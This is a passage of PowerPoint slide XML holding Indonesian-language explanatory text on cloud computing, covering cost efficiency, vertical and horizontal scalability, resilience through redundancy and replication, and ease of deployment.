              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sudut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pandang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelaraskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dioptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadirkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tantangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manfaat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diiklankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menarik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>awan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>henti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Scale-up (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penskalaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>vertikal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosesor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Scale-out (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penskalaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> horizontal) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> instance (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paralel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>-Penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelompokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Fitur-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Cloud yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meliputi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standardisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>portabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengotomatiskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
